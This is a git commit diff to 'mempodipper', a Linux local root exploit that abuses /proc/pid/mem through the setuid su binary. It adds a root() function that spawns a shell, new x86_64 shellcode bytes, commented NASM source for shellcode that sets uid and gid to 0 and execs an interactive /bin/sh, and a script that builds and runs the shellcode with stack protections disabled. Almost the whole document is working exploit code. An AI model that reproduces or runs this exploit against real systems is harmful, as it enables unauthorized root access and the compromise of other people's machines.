aboutsummaryrefslogtreecommitdiffstats
diff options
context:
space:
mode:
-rw-r--r--mempodipper.c21
-rwxr-xr-xrun-shellcode.sh2
-rw-r--r--shellcode-64.s49
3 files changed, 66 insertions, 6 deletions
diff --git a/mempodipper.c b/mempodipper.c
index b5efd53..1fb8cc2 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -113,6 +113,14 @@ int recv_fd()
return fd;
}
+void root()
+{
+ dup2(6, 2);
+ setuid(0);
+ setgid(0);
+ execl("/bin/sh", "sh", "-i", NULL);
+}
+
int main(int argc, char **argv)
{
if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c') {
@@ -145,6 +153,7 @@ int main(int argc, char **argv)
return -1;
}
printf("[+] Assigning fd %d to stderr.\n", fd);
+ dup2(2, 6);
dup2(fd, 2);
/*
Here is the asm from my /bin/su.
@@ -199,16 +208,16 @@ int main(int argc, char **argv)
"\x6a\x17\x58\x31\xdb\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x99\x31\xc9\xb0\x0b\xcd\x80";
#elif defined(__x86_64__)
- // Shellcode from: http://www.shell-storm.org/shellcode/files/shellcode-77.php
char shellcode[] =
- "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xd2\x48\xbb\xff\x2f\x62"
- "\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31"
- "\xc0\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05\x6a\x01\x5f\x6a\x3c"
- "\x58\x0f\x05";
+ "\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x40"
+ "\xb7\x06\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f\x2f\x62\x69"
+ "\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xdb"
+ "\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50\x51\x57\x48"
+ "\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
- printf("[+] Executing su with shellcode. There will be no prompt, so just type commands.\n");
+ printf("[+] Executing su with shellcode.\n");
execl("/bin/su", "su", shellcode, NULL);
} else {
sleep(0.01);
diff --git a/run-shellcode.sh b/run-shellcode.sh
new file mode 100755
index 0000000..5ffcf39
--- /dev/null
+++ b/run-shellcode.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+nasm -o /dev/stdout shellcode-64.s | msfencode4.0 -t c -e generic/none -b '\x00' > harness.c && echo "void main() { (*(void(*)())buf)(); }" >> harness.c && gcc -fno-stack-protector -z execstack -o harness harness.c && ./harness
diff --git a/shellcode-64.s b/shellcode-64.s
new file mode 100644
index 0000000..2514ed2
--- /dev/null
+++ b/shellcode-64.s
@@ -0,0 +1,49 @@
+BITS 64
+; This shell code sets uid and gid to 0 and execs a shell in interactive mode.
+; It also reopens stderr that was previously saved inside fd 6, for use with mempodipper.
+;
+; by zx2c4
+
+
+;setuid(0)
+xor rdi,rdi
+mov al,0x69
+syscall
+;setgid(0)
+xor rdi,rdi
+mov al,0x6a
+syscall
+;dup2(6, 2)
+mov dil,0x6
+mov sil,0x2
+mov al,0x21
+syscall
+
+; execve("//bin/sh", ["//bin/sh", "-i", 0], 0)
+mov qword rbx,'//bin/sh' ; rbx = //bin/sh
+shr rbx,0x8 ; remove leading / from rbx
+push rbx ; push rbx to stack
+mov rdi,rsp ; set rdi (arg 1) to top of stack
+
+xor rbx,rbx
+mov bx,'-i' ; rbx = '-i'
+push rbx ; push rbx to stack
+mov rcx,rsp ; set rcx to top of stack
+
+xor rax,rax ; rax = 0
+
+; so at this point:
+; rdi is a pointer to '/bin/sh'
+; rcx is a pointer to '-i'
+; rax is null
+; since they are all the same size, we'll push them on the stack
+; and then it will be an array:
+push rax ; push rax to stack
+push rcx ; push rcx to stack
+push rdi ; push rdi to stack
+mov rsi,rsp ; set rsi (arg 2) to top of stack
+
+xor rdx,rdx ; rdx (arg 3) = 0
+
+mov al,0x3b ; al = 0x3b, which is the exec call
+syscall